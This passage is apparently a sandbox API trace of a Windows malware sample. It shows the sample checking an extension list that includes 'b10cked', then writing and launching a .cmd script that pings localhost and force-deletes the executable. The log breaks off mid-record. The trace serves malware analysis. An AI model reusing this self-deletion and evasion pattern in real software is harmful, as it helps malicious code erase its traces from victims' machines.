[0098.090] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0098.090] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0098.090] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] 
GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x1500df0, dwCreationFlags=0x4, lpThreadId=0x151dd84 | out: lpThreadId=0x151dd84*=0xbdc) returned 0xb8 [0098.090] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0098.090] ResumeThread (hThread=0xb8) returned 0x1 [0098.090] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0098.320] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.321] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0098.321] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0098.321] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0098.321] LockResource (hResData=0x5187d4) returned 0x5187d4 [0098.321] FreeResource (hResData=0x5187d4) returned 0 [0098.321] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.321] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.321] SizeofResource 
(hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.321] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525120, cbMultiByte=38, lpWideCharStr=0x151df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.321] FreeResource (hResData=0x50d64c) returned 0 [0098.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1525124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x151de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x151de48, cbMultiByte=83, lpWideCharStr=0x14b012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0098.321] GetTickCount () returned 0x237b2 [0098.321] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15511021906) returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Z畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="A畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="K畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="k畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="L畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Z畔﮴\x12\x1c翻") returned 1 [0098.321] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0098.321] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0098.321] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpszShortPath=0x14bc65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe") returned 0x30 [0098.321] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f 
/q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0098.321] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0098.322] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x149fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", 
lpUsedDefaultChar=0x0) returned 145 [0098.370] WriteFile (in: hFile=0xe8, lpBuffer=0x149fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x149fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0098.371] CloseHandle (hObject=0xe8) returned 1 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbe8, dwThreadId=0xbec)) returned 1 [0098.469] CloseHandle (hObject=0xec) returned 1 [0098.469] CloseHandle (hObject=0xe8) returned 1 [0098.469] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () 
returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] WSACleanup () returned 0 [0098.713] FreeLibrary (hLibModule=0x77380000) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentProcess () returned 0xffffffff [0098.713] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0098.713] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] ResetEvent (hEvent=0x88) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 
0xbc0 [0098.713] ResetEvent (hEvent=0x88) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] CloseHandle (hObject=0x88) returned 1 [0098.714] CloseHandle (hObject=0x8c) returned 1 [0098.714] CloseHandle (hObject=0x84) returned 1 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, 
wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, 
wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 